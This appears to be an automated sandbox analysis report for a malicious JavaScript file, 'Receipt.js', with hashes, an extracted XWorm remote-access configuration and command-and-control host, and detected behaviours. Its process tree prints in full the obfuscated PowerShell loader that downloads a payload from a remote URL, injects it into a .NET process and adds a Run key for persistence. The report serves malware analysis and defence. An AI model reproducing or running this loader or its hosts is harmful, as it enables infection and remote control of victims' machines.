Analysis
-
max time kernel
543s -
max time network
591s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
19/09/2024, 15:10
Static task
static1
Behavioral task
behavioral1
Sample
Receipt.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Receipt.js
Resource
win10-20240404-en
General
-
Target
Receipt.js
-
Size
602KB
-
MD5
8743e7c5cb16316bd4e9490550beb168
-
SHA1
eb6cc147348a1245f3f0446e138f5d19223c1a86
-
SHA256
8b639e8b13b92592a894a1e7abd746e733cf79fa7fcda5509dbe7821a151d314
-
SHA512
6456ff46d46ea0096c8319e340857514cacd408921a0c524f1984c2dd13263e23a2ff4f496f8788c2c0534f4eefb2c04e922b643dc538f8f2ffb4eb462be1505
-
SSDEEP
12288:pVAli1MrUpKz7ukc8XbmUHB8gMsy3CX1CebKIpCQ12AGKuhjNUJjnYhxIzWr9DH9:0fHgCfu8YNxJX
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Extracted
xworm
5.0
newlivetoday8092.duckdns.org:8092
J9cUd9aXvcAKtnEh
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1824-142-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 3412 powershell.exe 5 3412 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2580 powershell.exe 3412 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\trecha.js" powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3412 set thread context of 1824 3412 powershell.exe 78 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 3412 powershell.exe 3412 powershell.exe 3412 powershell.exe 1824 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 3412 powershell.exe Token: SeDebugPrivilege 1824 AddInProcess32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1824 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 420 wrote to memory of 2580 420 wscript.exe 73 PID 420 wrote to memory of 2580 420 wscript.exe 73 PID 2580 wrote to memory of 3412 2580 powershell.exe 75 PID 2580 wrote to memory of 3412 2580 powershell.exe 75 PID 3412 wrote to memory of 4112 3412 powershell.exe 76 PID 3412 wrote to memory of 4112 3412 powershell.exe 76 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78 PID 3412 wrote to memory of 1824 3412 powershell.exe 78
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Receipt.js1⤵
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBuAFYAbwBLAGUALQBlAHgAcAByAGUAcwBTAGkATwBOACAAKAAgACgAKAAnAHsAJwArACcAMQB9AHUAJwArACcAcgBsACAAPQAgAHsAMgB9AGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AC8ALwBpACcAKwAnAGEAOQAwADQANgAwADEALgB1AHMALgBhAHIAYwBoACcAKwAnAGkAdgBlAC4AbwByAGcALwAnACsAJwA2AC8AaQB0ACcAKwAnAGUAJwArACcAbQAnACsAJwBzAC8AZAAnACsAJwBlAHQAJwArACcAYQAnACsAJwBoAC0AJwArACcAbgAnACsAJwBvACcAKwAnAHQAZQAnACsAJwAtAGoALwBEAGUAJwArACcAdAAnACsAJwBhAGgATgBvACcAKwAnAHQAZQAnACsAJwBKACcAKwAnAC4AdAB4AHQAewAyAH0AJwArACcAOwB7ADEAJwArACcAfQBiAGEAJwArACcAcwBlADYAJwArACcANAAnACsAJwBDACcAKwAnAG8AbgB0AGUAJwArACcAbgB0ACAAJwArACcAPQAgACgATgBlAHcALQAnACsAJwBPAGIAagAnACsAJwBlACcAKwAnAGMAdAAgAFMAeQAnACsAJwBzAHQAZQAnACsAJwBtAC4ATgAnACsAJwBlAHQALgBXAGUAJwArACcAYgBDAGwAaQBlACcAKwAnAG4AdAApAC4ARAAnACsAJwBvAHcAbgBsAG8AYQBkACcAKwAnAFMAJwArACcAdAAnACsAJwByACcAKwAnAGkAbgBnACgAewAnACsAJwAxAH0AdQByAGwAJwArACcAKQAnACsAJwA7ACcAKwAnAHsAMQB9AGIAaQBuAGEAcgB5AEMAJwArACcAbwBuAHQAZQBuAHQAIAAnACsAJwA9ACAAWwBTAHkAcwB0AGUAbQAnACsAJwAuAEMAbwBuAHYAZQByAHQAJwArACcAXQA6ADoARgByACcAKwAnAG8AbQBCAGEAJwArACcAcwBlADYANAAnACsAJwBTAHQAJwArACcAcgBpACcAKwAnAG4AJwArACcAZwAoACcAKwAnAHsAJwArACcAMQB9AGIAYQBzAGUANgA0AEMAbwBuACcAKwAnAHQAJwArACcAZQBuACcAKwAnAHQAKQA7ACcAKwAnAHsAJwArACcAMQB9AGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbACcAKwAnAFIAZQBmAGwAZQBjACcAKwAnAHQAaQBvAG4ALgBBAHMAcwAnACsAJwBlAG0AJwArACcAYgBsACcAKwAnAHkAXQA6ADoAJwArACcATAAnACsAJwBvAGEAZAAoAHsAJwArACcAMQB9AGIAaQBuAGEAcgB5ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAKQAnACsAJwA7AHsAMQB9ACcAKwAnAHQAeQAnACsAJwBwAGUAIAA9ACAAJwArACcAewAxACcAKwAnAH0AJwArACcAYQBzAHMAJwArACcAZQBtACcAKwAnAGIAJwArACcAbAB5AC4ARwBlAHQAJwArACcAVAB5ACcAKwAnAHAAZQAoAHsAMgB9AFIAdQAnACsAJwBuAFAARQAuAEgAbwBtAGUAewAnACsAJwAyACcAKwAnAH0AKQAnACsAJwA7AHsAMQB9AG0AZQAnACsAJwB0AGgAbwBkACAAPQAgAHsAMQB9ACcAKwAnAHQAJwArACcAeQBwACcAKwAnAGUAJwArACcALgBHAGUAdABNAGUAJwArACcAdABoAG8AZAAnACsAJwAoAHsAJwArACcAMgB9AFYAJwArACcAQQBJACcAKwAnAHsAMgB9ACkAOwAnACsAJwB7ADEAfQBtAGUAdABoAG8AJwArACcAZAAuAEkAbgB2AG8AawAnACsAJwBlACcAKwAnACgAewAxACcAKwAnAH0AbgAnACsAJwB1AGwAbAAsACAAWwAnACsAJwBvAGIAagBlACcAKwAnAGMAdABbAF0AXQBAACgAewAnACsAJwAyAH0AJwArACcANQAnACsAJwBjADkANwBlAGIAYQAnACsAJwA5ADAAMQA5AGUALQAnACsAJwBjACcAKwAnAGMAMwBiAC0AMAAnACsAJwAwACcAKwAnADIANAAtAGQAYQBlADgALQA2ADEAJwArACcANAA4AGMAOABkADYAPQBuAGUAawBvAHQAJgBhAGkAZABlAG0APQAnACsAJwB0AGwAYQAnACsAJwA/AHQAJwArACcAeAB0AC4AJwArACcANAAyADAAMgA5ADAANQAxADIAOQAwADgAJwArACcAbQByAG8AdwB4ACcAKwAnAG4AJwArACcAaABvAGoAJwArACcALwBvACcAKwAnAC8AbQBvACcAKwAnAGMALgAnACsAJwB0ACcAKwAnAG8AcABzAHAAJwArACcAcAAnACsAJwBhACcAKwAnAC4ANAAyADAAMgBzAHQAcAB5AHIAYwAvAGIALwAwAHYALwBtACcAKwAnAG8AYwAnACsAJwAuAHMAaQBwAGEAZQBsAGcAbwAnACsAJwBvAGcALgBlAGcAYQByAG8AJwArACcAdAAnACsAJwBzAGUAcwBhACcAKwAnAGIAZQAnACsAJwByAGkAZgAvAC8AOgBzAHAAdAB0AGgAewAyAH0AIAAsACAAewAyACcAKwAnAH0AMQB7ACcAKwAnADIAfQAgACwAJwArACcAIAB7ADIAJwArACcAfQAnACsAJwBDADoAewAwAH0AJwArACcAUAByACcAKwAnAG8AZwAnACsAJwByAGEAbQBEAGEAdABhAHsAMAAnACsAJwB9AHsAJwArACcAMgB9ACAALAAgACcAKwAnAHsAMgB9AHQAcgBlAGMAaABhAHsAMgB9ACcAKwAnACwAewAnACsAJwAyACcAKwAnAH0AQQBkACcAKwAnAGQASQAnACsAJwBuAFAAJwArACcAcgAnACsAJwBvAGMAZQBzACcAKwAnAHMAMwAnACsAJwAyAHsAMgB9ACcAKwAnACwAewAnACsAJwAyAH0AJwArACcAZABlACcAKwAnAHMAJwArACcAYQB0AGkAdgBhAGQAbwAnACsAJwB7ADIAfQApACkAJwApACAAIAAtAEYAIABbAEMAaABhAHIAXQA5ADIALABbAEMAaABhAHIAXQAzADYALABbAEMAaABhAHIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "InVoKe-expresSiON ( (('{'+'1}u'+'rl = {2}ht'+'t'+'ps://i'+'a904601.us.arch'+'ive.org/'+'6/it'+'e'+'m'+'s/d'+'et'+'a'+'h-'+'n'+'o'+'te'+'-j/De'+'t'+'ahNo'+'te'+'J'+'.txt{2}'+';{1'+'}ba'+'se6'+'4'+'C'+'onte'+'nt '+'= (New-'+'Obj'+'e'+'ct Sy'+'ste'+'m.N'+'et.We'+'bClie'+'nt).D'+'ownload'+'S'+'t'+'r'+'ing({'+'1}url'+')'+';'+'{1}binaryC'+'ontent '+'= [System'+'.Convert'+']::Fr'+'omBa'+'se64'+'St'+'ri'+'n'+'g('+'{'+'1}base64Con'+'t'+'en'+'t);'+'{'+'1}assembly = ['+'Reflec'+'tion.Ass'+'em'+'bl'+'y]::'+'L'+'oad({'+'1}binary'+'C'+'ont'+'e'+'nt)'+';{1}'+'ty'+'pe = '+'{1'+'}'+'ass'+'em'+'b'+'ly.Get'+'Ty'+'pe({2}Ru'+'nPE.Home{'+'2'+'})'+';{1}me'+'thod = {1}'+'t'+'yp'+'e'+'.GetMe'+'thod'+'({'+'2}V'+'AI'+'{2});'+'{1}metho'+'d.Invok'+'e'+'({1'+'}n'+'ull, ['+'obje'+'ct[]]@({'+'2}'+'5'+'c97eba'+'9019e-'+'c'+'c3b-0'+'0'+'24-dae8-61'+'48c8d6=nekot&aidem='+'tla'+'?t'+'xt.'+'420290512908'+'mrowx'+'n'+'hoj'+'/o'+'/mo'+'c.'+'t'+'opsp'+'p'+'a'+'.4202stpyrc/b/0v/m'+'oc'+'.sipaelgo'+'og.egaro'+'t'+'sesa'+'be'+'rif//:sptth{2} , {2'+'}1{'+'2} ,'+' {2'+'}'+'C:{0}'+'Pr'+'og'+'ramData{0'+'}{'+'2} , '+'{2}trecha{2}'+',{'+'2'+'}Ad'+'dI'+'nP'+'r'+'oces'+'s3'+'2{2}'+',{'+'2}'+'de'+'s'+'ativado'+'{2}))') -F [Char]92,[Char]36,[Char]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\trecha.js"4⤵PID:4112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1824
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54945a9114c9f19254f25a0596e6d686a
SHA1686826f31c4c6bc23974aa79c1f18521bb734aaf
SHA256e7538cae3c3b47be7d3f760b04122fea26d06f8da6e8bc99259f4ee59041d55d
SHA5128269e8d8b2822f7690a05ee9a76c9a916817046ec0b9f3da842a4ae54f032024a7836f62575d3e991297d272492e5a37957efe2e9fe954de30bf92024e23de00
-
Filesize
1KB
MD50c3d308ece53c5970b74ae0b005961b0
SHA19955ee238c7c231d7d632db2f817641f4a8132dd
SHA256bf196243a19d60c774e1bc082da7fd0ee19bca167b5530ca5269546cabdfd3db
SHA5121dbbcf26978f191770693da1ed0b18b6d4c77351c0fa11fd573291289fc815e99ac229381693026accebaaf525e3afc91866f8ceb8917267ee946f59371b783e
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a